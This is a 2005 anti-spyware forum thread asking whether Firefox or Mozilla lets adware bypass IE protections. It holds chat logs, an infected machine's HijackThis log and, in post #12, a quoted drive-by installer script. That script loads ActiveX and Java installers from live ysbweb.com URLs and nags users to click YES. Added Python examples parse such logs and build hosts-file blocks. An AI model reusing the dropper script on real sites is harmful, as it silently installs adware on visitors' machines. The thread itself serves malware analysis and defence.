Theory


116 replies to this topic

#1 Coyote

    Emeritus-Expert

  • Authentic Member
  • 979 posts

Posted 04 March 2005 - 10:10 AM

If you want to point someone at this post:
http://TomCoyote.org/Theory/
that link will bring you to here

My apologies if anyone takes anything said against their browser, their surfing, their computer, their dogs or their cats; this is just a conversation that needs to be thought about.


[ 09:39:25 ]  [ @Efwis ] I had fun the other night, was surfing the web for a neildiamond song, got nailed with a major hijacking
[ 09:39:33 ]  [ @Efwis ] *Neil Diamond
[ 09:39:43 ]  [ @Coyote` ] neil will do that to you
[ 09:39:54 ]  [ @Coyote` ] go with Pink Floyd next time
[ 09:40:45 ]  [ @Efwis ] heh, hit me with 180solutions, l2m, 10 viruses 2 trojan downloaders, a java exploit, and a homepage hijack, went right around Moz and nailed IE
[ 09:40:46 ]  [ @Coyote` ] it's a crying shame that no one is safe looking for things nowadays
[ 09:41:12 ]  [ @Efwis ] oh I forgot ISTVbar and sidesearch
[ 09:41:41 ]  [ @Coyote` ] let's say you have IE secure, and you use another browser
[ 09:42:31 ]  [ @Coyote` ] this other browser allows something to happen that bypasses the first block you have built into IE say Iespyads, thus IE is now a target again through this other browser
[ 09:42:44 ]  [ @Coyote` ] this IS just a theory btw
[ 09:42:51 ]  [ @Coyote` ] but it is possible
[ 09:43:31 ]  [ @Coyote` ] now if you go to that same site in IE, nothing happens because your first block stopped it
[ 09:43:45 ]  [ @Efwis ] I looked in my IE_Spyad files, this page isn't even listed, although it should be, I think I will contact Eric Howes and he can add it to his next update
[ 09:44:11 ]  [ @Coyote` ] are you in the classroom?
[ 09:44:18 ]  [ @Efwis ] yeah, your theory has merit and is probably quite accurate
[ 09:44:22 ]  [ @Efwis ] yes I am
[ 09:44:32 ]  [ @Coyote` ] have you been keeping up with wng_z3r0's problem that I have posted to?
[ 09:44:45 ]  [ @Efwis ] no, got a link?
[ 09:44:53 ]  [ @Coyote` ] http://forums.tomcoy...ndpost&p=137765
[ 09:45:08 ]  [ @Coyote` ] took 4 pages of posts to finally get to the root of the problem
[ 09:45:26 ]  [ @Efwis ] looking
[ 09:45:41 ]  [ @Coyote` ] his shell browser covering IE allowed something IE wouldn't
[ 09:46:31 ]  [ @Coyote` ] not so much a theory anymore
[ 09:48:00 ]  [ @bozodog ] are you saying that Mozilla can let stuff through to IE and beyond?
[ 09:48:50 ]  [ @Coyote` ] I am not saying anything about moz, I am saying it is a possibility that an alternate browser can let things bypass to IE and therefore cause problems
[ 09:49:44 ]  [ @Coyote` ] and by them bypassing to IE, IE's protections can be bypassed that normally wouldn't if IE was in use instead of the alternate
[ 09:50:29 ]  [ @bozodog ] err.. I think I understand
[ 09:51:01 ]  [ @Coyote` ] it's like a layer effect, you have layers of protections you set in place, using an alternate browser, you can possibly bypass a layer or two which in turn can lead to your being infected
[ 09:51:36 ]  [ @Coyote` ] it may not go in the front door but it might find a side window
[ 09:51:37 ]  [ @bozodog ] Ahh..
[ 09:52:45 ]  [ @Coyote` ] I won't say that it is possible with any particular browser, I think in fact it may be possible with any browser
[ 09:53:03 ]  [ @Coyote` ] but this is only theory at this point
[ 09:53:24 ]  [ @Coyote` ] some script kiddie will strive to make it happen on a regular basis eventually
[ 09:54:10 ]  [ @bozodog ] sounds like a solid thought... they are getting better at mucking up our systems..
[ 09:54:36 ]  [ @Coyote` ] well, the problem itself goes back to windows,
[ 09:54:53 ]  [ @Coyote` ] windows is made to accommodate users of limited knowledge
[ 09:55:06 ]  [ @bozodog ] but doesn't your AV, etc... do its job in that case?
[ 09:55:09 ]  [ @Coyote` ] so that in itself is preyed upon by the kiddies
[ 09:55:36 ]  [ @Coyote` ] AV is only one part of an overall solution and it lacks a great deal of the overall protection
[ 09:56:07 ]  [ @Coyote` ] the AV chosen also plays a part in how that is defined
[ 09:56:42 ]  [ @Coyote` ] several AV's have weak real time scanning engines that fail at the sight of any infection
[ 09:57:15 ]  [ @Coyote` ] real time scanning engines are the only way to truly combat viruses and trojans
[ 09:57:28 ]  [ @bozodog ] I only use Avast free... and spywareblaster etc..
[ 09:57:42 ]  [ @Coyote` ] I have not tried Avast
[ 09:57:51 ]  [ @Coyote` ] so I cannot comment on it
[ 09:58:27 ]  [ @bozodog ] it sure updates often, (2-3 times a day at times)
[ 09:58:51 ]  [ @Coyote` ] I hope that is because they are adding to the database and not correcting mistakes
[ 09:58:58 ]  [ @bozodog ] and scares the heck outa me when some baddie tries to get in
[ 09:59:15 ]  [ @bozodog ] yeah, it's data
[ 09:59:34 ]  [ @Coyote` ] well, you can't tell from the updating
[ 09:59:53 ]  [ @Coyote` ] you would have to dissect each dataflow
[ 10:00:03 ]  [ @Coyote` ] and know what coding they use
[ 10:00:51 ]  [ @Efwis ] from looking at that post, I would say you are correct Tom, no longer a theory but a proven fact
[ 10:01:15 ]  [ @bozodog ] of course I don't surf the back alleys, or p2p stuff
[ 10:01:24 ]  [ @Coyote` ] well, fact for his situation, theory for other browsers at this point
[ 10:01:52 ]  [ @Coyote` ] bozodog look at what happened to Efwis looking for a neil diamond song
[ 10:01:59 ]  [ @Efwis ] based on what happened to me it's a fact for Moz too
[ 10:02:01 ]  [ @bozodog ] yep
[ 10:02:30 ]  [ @bozodog ] do you use Moz or FF?
[ 10:02:31 ]  [ @Coyote` ] I hate it when I am correct about some of these theories but I am right too many times
[ 10:02:48 ]  [ @Efwis ] I went there with my IE yesterday, nothing happened, all my protections worked correctly
[ 10:03:13 ]  [ @bozodog ] you're like a hound dog.. you can sniff out problems
[ 10:03:13 ]  [ @Efwis ] so I am inclined to believe it is something actually programmed into the html code
[ 10:03:40 ]  [ @Efwis ] he is good at what he does, and I like his info, because he usually is correct bd
[ 10:04:23 ]  [ @bozodog ] don't I know it... he knows I have the highest respect for what he says
Go forth and conquer your goals with the renewed spirit of Coyote and do not let small setbacks stop you from Your Dreams

Microsoft MVP 2006-2007


May your day be blessed by those you love and those you love be blessed by HIM ;-)


#2 Efwis

    Authentic Member

  • 76 posts

Posted 04 March 2005 - 06:18 PM

The below log was generated from a machine that went to the website where I got nailed at. Prior to going to the website this computer was 100% clean. Once again this went around a mozilla based browser, specifically Firefox.

Logfile of HijackThis v1.99.1
Scan saved at 6:39:10 PM, on 3/4/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\VMware\VMware Tools\VMwareTray.exe
C:\Program Files\VMware\VMware Tools\VMwareUser.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\VMware\VMware Tools\VMwareService.exe
C:\WINDOWS\System32\wuauclt.exe
C:\WINDOWS\System32\wpabaln.exe
C:\WINDOWS\explorer.exe
C:\Program Files\ISTsvc\istsvc.exe
C:\WINDOWS\efkvjaxe.exe
C:\WINDOWS\System32\pifrop.exe
C:\WINDOWS\System32\pridmd.exe
C:\Program Files\AutoUpdate\AutoUpdate.exe
C:\Program Files\Web_Rebates\WebRebates1.exe
c:\program files\180solutions\sais.exe
C:\Program Files\Web_Rebates\WebRebates0.exe
C:\Program Files\CxtPls\CxtPls.exe
C:\HijackThis\HijackThis.exe

O2 - BHO: (no name) - {016235BE-59D4-4CEB-ADD5-E2378282A1D9} - C:\Program Files\CxtPls\cxtpls.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: (no name) - {8AB8080E-1276-4F6C-9340-F7ABF14760E8} - C:\Documents and Settings\edited\My Documents\Spyware\AdGoblin_kbmdlt\kbmdlt.dll (file missing)
O2 - BHO: BAHelper Class - {A3FDD654-A057-4971-9844-4ED8E67DBBB8} - C:\Program Files\SideFind\sfbho.dll
O2 - BHO: (no name) - {F7D4D9DA-41FD-4B3A-82E8-6BE117DBF3FC} - C:\Documents and Settings\edited\My Documents\Spyware\AdGoblin\AdGoblin\jsgdw400.dll (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: YourSiteBar - {86227D9C-0EFE-4f8a-AA55-30386A3F5686} - C:\PROGRA~1\YOURSI~1\ysb.dll
O4 - HKLM\..\Run: [VMware Tools] C:\Program Files\VMware\VMware Tools\VMwareTray.exe
O4 - HKLM\..\Run: [VMware User Process] C:\Program Files\VMware\VMware Tools\VMwareUser.exe
O4 - HKLM\..\Run: [IST Service] C:\Program Files\ISTsvc\istsvc.exe
O4 - HKLM\..\Run: [amvV9A] C:\WINDOWS\efkvjaxe.exe
O4 - HKLM\..\Run: [sais] c:\program files\180solutions\sais.exe
O4 - HKLM\..\Run: [AutoLoaderAproposClient] "C:\DOCUME~1\Jeff\LOCALS~1\Temp\cxtpls_loader.exe" /PC=CP.IST /ForSupportedBrowsers /ShowLegalNote=nonbranded
O4 - HKLM\..\Run: [q37P3sP] pridmd.exe
O4 - HKLM\..\Run: [AutoUpdater] "C:\Program Files\AutoUpdate\AutoUpdate.exe"
O4 - HKLM\..\Run: [ilshiz] C:\WINDOWS\ilshiz.exe
O4 - HKLM\..\Run: [Power Scan] C:\Program Files\Power Scan\powerscan.exe
O4 - HKLM\..\Run: [WebRebates0] C:\Program Files\Web_Rebates\WebRebates0.exe
O4 - HKLM\..\RunOnce: [djtopr1150.exe] "C:\DOCUME~1\Jeff\LOCALS~1\Temp\djtopr1150.exe"
O4 - HKCU\..\Run: [SpySweeper] "C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe" /0
O4 - HKCU\..\Run: [b0oFRijnT] pifrop.exe
O4 - Startup: zlv8eyi9.lnk = C:\WINDOWS\zlv8eyi9.exe
O4 - Global Startup: zlv8eyi9.lnk = C:\WINDOWS\zlv8eyi9.exe
O9 - Extra button: SideFind - {10E42047-DEB9-4535-A118-B3F6EC39B807} - C:\Program Files\SideFind\sidefind.dll
O16 - DPF: {42F2C9BA-614F-47C0-B3E3-ECFD34EED658} (Installer Class) - hxxp://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab
O23 - Service: VMware Tools Service (VMTools) - VMware, Inc. - C:\Program Files\VMware\VMware Tools\VMwareService.exe
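A small triage script for a HijackThis log like the one above, added here as an example (it is not code from the thread or from HijackThis): it parses the O4 autorun and O16 DPF entries and flags the patterns that stand out in this log, a bare file name with no path, an executable run from a Temp directory, one dropped directly under C:\WINDOWS, and a remote CAB download. The sample log is a constructed subset of the posted one with the account name in the Temp path replaced.

```python
import re

# Constructed sample: a subset of the HijackThis log posted above, one entry per line,
# with the account name in the Temp path replaced by "user".
SAMPLE_LOG = r"""
Logfile of HijackThis v1.99.1
O4 - HKLM\..\Run: [VMware Tools] C:\Program Files\VMware\VMware Tools\VMwareTray.exe
O4 - HKLM\..\Run: [amvV9A] C:\WINDOWS\efkvjaxe.exe
O4 - HKLM\..\Run: [AutoLoaderAproposClient] "C:\DOCUME~1\user\LOCALS~1\Temp\cxtpls_loader.exe" /PC=CP.IST
O4 - HKLM\..\Run: [q37P3sP] pridmd.exe
O4 - HKCU\..\Run: [b0oFRijnT] pifrop.exe
O4 - Startup: zlv8eyi9.lnk = C:\WINDOWS\zlv8eyi9.exe
O16 - DPF: {42F2C9BA-614F-47C0-B3E3-ECFD34EED658} (Installer Class) - hxxp://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab
"""

ENTRY_RE = re.compile(r"^(O\d+) - (.*)$")   # every HijackThis item starts with an O-code

def parse_o4(body):
    """Split an O4 body into (location, value name, command line)."""
    loc, _, rest = body.partition(": ")
    if rest.startswith("["):                    # registry Run entry: [name] command
        name, _, cmd = rest[1:].partition("] ")
    else:                                       # Startup folder entry: file.lnk = target
        name, _, cmd = rest.partition(" = ")
    return loc, name, cmd.strip()

def exe_path(cmd):
    """Executable part of a command line: quoted, unquoted with spaces, or a bare name."""
    if cmd.startswith('"'):
        return cmd[1:cmd.find('"', 1)]
    m = re.match(r"(.*?\.(?:exe|com|scr|bat))", cmd, re.I)
    return m.group(1) if m else cmd.split(" ")[0]

def path_reasons(path):
    """Heuristics for an autorun target; each one matches something in the posted log."""
    low = path.lower()
    reasons = []
    if "\\" not in low:
        reasons.append("bare file name, resolved through the search path")
    if "\\temp\\" in low:
        reasons.append("runs from a Temp directory")
    if low.rsplit("\\", 1)[0] == "c:\\windows":
        reasons.append("dropped directly under C:\\WINDOWS")
    return reasons

def triage(log_text):
    """Return (code, name, path-or-host, reason) tuples that deserve a second look."""
    findings = []
    for line in log_text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if not m:
            continue
        code, body = m.groups()
        if code == "O4":
            _, name, cmd = parse_o4(body)
            path = exe_path(cmd)
            findings += [(code, name, path, r) for r in path_reasons(path)]
        elif code == "O16":                     # Download Program Files: ActiveX fetched from the web
            url = body.rsplit(" - ", 1)[1]
            host = re.sub(r"^h..ps?://", "", url).split("/")[0]
            g = re.search(r"\{[0-9A-Fa-f-]+\}", body)
            findings.append((code, g.group(0) if g else "?", host, "remote ActiveX download (DPF)"))
    return findings
```

Running `triage(SAMPLE_LOG)` leaves the VMware entry alone and flags the five adware autoruns plus the ysbweb.com CAB, which is the same install vector the script later in this thread uses.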

#3 shelf life

    SuperMember

  • Visiting Fellow
  • 3,191 posts

Posted 04 March 2005 - 08:21 PM

Efwis, can you post a link to the website
How Can I Reduce My Risk?

#4 wng_z3r0

    MRU Emeritus

  • Authentic Member
  • 986 posts
  • Interests: Cornet, video games

Posted 05 March 2005 - 01:57 AM

If such a theory were true, is there a way to "really" uninstall iexplorer?
There are 10 kinds of people in this world, those who understand binary #'s & those who don't
Just my 10 cents

Proud member of Alliance of Security Analysis Professionals since 2005

#5 Coyote

    Emeritus-Expert

  • Authentic Member
  • 979 posts

Posted 05 March 2005 - 04:58 AM

This go over your head? The problem is not IE; if you have IE protected and then use an alternate browser that bypasses IE's protection, that is the problem. IE is integrated deep into the system, you can't get rid of it.

#6 Efwis

    Authentic Member

  • 76 posts

Posted 05 March 2005 - 06:45 AM

Efwis, can you post a link to the website



That is something that I would rather not post for the safety of our members. However, I can tell you that the website is real since the above log is not mine, but a fellow malware hunter's log from going to the same site I did.

#7 ChrisRLG

    Emeritus-Spyware Fighter

  • Authentic Member
  • 3,855 posts

Posted 05 March 2005 - 10:10 AM

Efwis, has Jeff got his computer clean now? (It's in the path statements.) Tip: when posting, make sure they are edited out.

Matthew 7:7"Ask and it will be given to you; seek and you will find; knock and a door will be opened to you."

#8 wng_z3r0

    MRU Emeritus

  • Authentic Member
  • 986 posts
  • Interests: Cornet, video games

Posted 05 March 2005 - 10:13 AM


IE is integrated deep into the system, you can't get rid of it.

That's my point.

If we can't really get rid of it, then how much use are other browsers? Sure they offer better protection than IE, but if malware can USE the other browser to bypass IE's security, then what is the point?

#9 Besttechie

    New Member

  • 3 posts

Posted 05 March 2005 - 10:37 AM

Hey Everyone, As you can see from the log Efwis posted (which is my log) I infected my PC. The infections aren't that tough to remove; you can easily remove the infections with Spybot Search & Destroy along with HJT after. I took my time in looking into the files and analyzing them. It's basic infections such as IST, PowerScan, SideFind, Webrebates, and a few others. Now, here is an interesting piece of information. I decided to reinfect myself again (using the same link) but the second time I reinfected myself, there were a few new pieces of spyware installed. Mostly the same as before, but also added a few new things. Thought that was interesting. This might be something to look out for using Firefox to infect IE. ChrisRLG: Yes, I have cleaned out the infection. B) If you have any more questions for me, feel free to post them. I'll do my best to answer. B
I am Besttechie but you have heard of me.... eh?
Master and Commander of BestTechie.net
Resident All Around Tech Guru

#10 insipid

    Authentic Member

  • 53 posts

Posted 05 March 2005 - 11:15 AM

Now, here is an interesting piece of information.  I decided to reinfect myself again (using the same link) but the second time I reinfected myself, there were a few new pieces of spyware installed.  Mostly the same as before, but also added a few new things.  Thought that was interesting.  This might be something to look out for using Firefox to infect IE. 



This is my concern. If this is truly happening, it will spread like the plague (recall how fast Vx2 burst out). The above infection won't be tough to remove, and it would be easy enough to block one site with a Hosts file, but what is it going to evolve into?

Which begs the real questions: How to prevent this? Recommend switching back to IE? Shall I give up my tabbed browsing?

Gah, the hits just keep on coming, don't they?


#11 Coyote

    Emeritus-Expert

  • Authentic Member
  • 979 posts

Posted 05 March 2005 - 01:05 PM

It is always your choice as to what to use. I have always said, though, that if you don't protect IE then you are in for a surprise; now, even with protecting IE, you could have a problem, so it is not that simple anymore given the above situation. Should you switch back to IE and give up what you want? That you will have to answer for yourself; it is your computer.

#12 Coyote

    Emeritus-Expert

  • Authentic Member
  • 979 posts

Posted 05 March 2005 - 07:39 PM

This is a .js file that was called from the link in question that infected Efwis.

DO NOT CLICK ON ANY LINKS IN THE CODE BELOW!!!

var flag=0;
 var loadfirst=0;
 var sp2=false;
 if(window.navigator.userAgent.indexOf("SV1") != -1) sp2=true;
 if (sp2){
   document.write('<div id="tutorial_popup" style="visibility:hidden;position:absolute;top:0px;left:0px;width:635px;height:308px;"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="635" height="308">');
   document.write('<param name="movie" value="http://www.slotchbar.com/ist/flash/sp2tutorial_v1.swf">param name="quality" value="high"><param name="wmode" value="transparent">');
   document.write('<embed src="http://www.ysbweb.com/ist/flash/sp2tutorial_v1.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="700" height="500"></embed></object></div>');
 document.write('<iframe id="downloads_manager" style="position:absolute; visibility:hidden;"></iframe>');
 function retryit(){	
	if(window.retry && retry>0) {
  	alert("You must click YES to have access");
  	loadfirst=0;
  	start_download();
  	retry--;
 function showActiveX() {
        holder.write('<OBJECT id="barobject" width=1 height=1 classid="CLSID:42F2C9BA-614F-47c0-B3E3-ECFD34EED658"');
        holder.write('codebase="http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab" onerror="parent.retryit();">');
        holder.write('<PARAM name="account_id" value="1001958">');
        holder.write('<PARAM name="download_key" value="7691d7d23d9583dd2f6752e154d4602f">');
        holder.write('<PARAM name="download_lock" value="1110072926">');
        holder.write('<PARAM name="cfg" value="ysb_l3">');
        holder.write('<PARAM name="sub" value="">');
        holder.write('</OBJECT>');
 function showJava() {
          holder.write('<APPLET Archive="http://www.ysbweb.com/ist/softwares/v4.0/javainstaller.jar" code="javainstaller.InstallerApplet.class" name="InstallerApplet" width="0" height="0" hspace="0" vspace="0" align="middle">');
          holder.write('<PARAM name="account_id" value="1001958">');
          holder.write('<PARAM name="download_key" value="7691d7d23d9583dd2f6752e154d4602f">');
          holder.write('<PARAM name="download_lock" value="1110072926">');
          holder.write('<PARAM name="cfg" value="ysb_l3">');
          holder.write('<PARAM name="sub" value="">');
          holder.write('</APPLET>');
 function showNS() {
          holder.write('<APPLET Archive="http://www.ysbweb.com/ist/softwares/v4.0/javainstaller.jar" code="javainstaller.InstallerApplet.class" name="InstallerApplet" width="0" height="0" hspace="0" vspace="0" align="middle">');
          holder.write('<PARAM name="account_id" value="1001958">');
          holder.write('<PARAM name="download_key" value="7691d7d23d9583dd2f6752e154d4602f">');
          holder.write('<PARAM name="download_lock" value="1110072926">');
          holder.write('<PARAM name="cfg" value="ysb_l3">');
          holder.write('<PARAM name="sub" value="">');
          holder.write('</APPLET>');
 function start_download() {
        var bname=navigator.appName;
        var bver=parseInt(navigator.appVersion);
        if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
                if(!loadfirst || sp2){
                        downloads_manager.document.close();
                        holder= downloads_manager.document;
                        holder=document;
                showActiveX();
                if (sp2) document.all.tutorial_popup.style.visibility = "visible";
                if(!flag && !sp2){
                        window.open("

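The script above picks its installer by browser: the ActiveX OBJECT with a CAB codebase for IE, and a Java applet JAR for everything else, with a Flash overlay coaching SP2 users to accept the prompt. The following Python is an added example, not code from the thread: it pulls the payload hosts out of a script like this one, says which browser population each payload type reaches, and emits both a hosts-file block (covers every browser) and an IE Restricted Sites .reg fragment (covers IE only, which is why IE-SPYAD did not help the Mozilla user here). The sample lines are quoted from the script above with the URLs defanged.

```python
import re

# Constructed sample: the payload-loading lines of the script quoted above, with the
# URLs defanged (hxxp) so that nothing here resolves if the text is pasted elsewhere.
SAMPLE_SCRIPT = r"""
holder.write('<OBJECT id="barobject" classid="CLSID:42F2C9BA-614F-47c0-B3E3-ECFD34EED658"');
holder.write('codebase="hxxp://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab" onerror="parent.retryit();">');
holder.write('<APPLET Archive="hxxp://www.ysbweb.com/ist/softwares/v4.0/javainstaller.jar" code="javainstaller.InstallerApplet.class">');
document.write('<param name="movie" value="hxxp://www.slotchbar.com/ist/flash/sp2tutorial_v1.swf">');
"""

# Matches live or defanged URLs ending in the three payload types the script uses.
URL_RE = re.compile(r"h(?:tt|xx)ps?://([^/'\"\s]+)/[^'\"\s]*?\.(cab|jar|swf)\b", re.I)

# Which browsers each payload type reaches. The thread's point: Restricted Sites
# (IE-SPYAD) governs IE only, while the applet runs in any browser with the Java plug-in.
VECTORS = {
    "cab": "ActiveX control via codebase: IE only, subject to IE security zones",
    "jar": "Java applet installer: any browser with Java enabled, Mozilla/Firefox included",
    "swf": "Flash overlay: decoy coaching the user to accept the install prompt",
}

def extract_payloads(script):
    """Map each host to the set of payload extensions the script loads from it."""
    found = {}
    for host, ext in URL_RE.findall(script):
        found.setdefault(host.lower(), set()).add(ext.lower())
    return found

def describe(payloads):
    """One line per host/payload pair saying which browser population it reaches."""
    return [f"{h}: .{e} -> {VECTORS[e]}"
            for h, exts in sorted(payloads.items()) for e in sorted(exts)]

def hosts_block(payloads):
    """Hosts-file lines. Unlike IE zones, these apply to every browser on the machine."""
    return [f"127.0.0.1 {host}" for host in sorted(payloads)]

def restricted_zone_reg(payloads):
    """A .reg fragment adding each domain to IE's Restricted Sites zone (zone 4).
    Only IE consults this map, so it does nothing for the Mozilla path seen in the thread."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for host in sorted(payloads):
        domain = ".".join(host.split(".")[-2:])   # crude registrable-domain guess
        lines.append(r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
                     r"\Internet Settings\ZoneMap\Domains\%s]" % domain)
        lines.append('"*"=dword:00000004')
        lines.append("")
    return "\n".join(lines)
```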

#13 Guest_herbalist_*

  • Guests

Posted 06 March 2005 - 04:34 AM

Efwis, Do you happen to know which version of Firefox was being used? Rick

#14 helpless

    Authentic Member

  • 193 posts

Posted 06 March 2005 - 05:42 AM

I can say at work using other browsers than MSIE is not allowed; for example, Mozilla Firefox will always bypass the blocking we have on some websites. I have seen it, done it and reported it. It's more than logic that each browser needs its own different protection (if needed), because they are nested differently into your OS.

Edited by helpless, 06 March 2005 - 05:43 AM.


#15 Efwis

    Authentic Member

  • 76 posts

Posted 06 March 2005 - 08:06 AM

Efwis,
Do you happen to know which version of Firefox was being used?
Rick

When it came to my infection it was through plain Mozilla version 1.7. Windows SP2 is installed on my machine also.

the log provided by Besttechie in this post was through IE.

Edited by Efwis, 06 March 2005 - 08:07 AM.
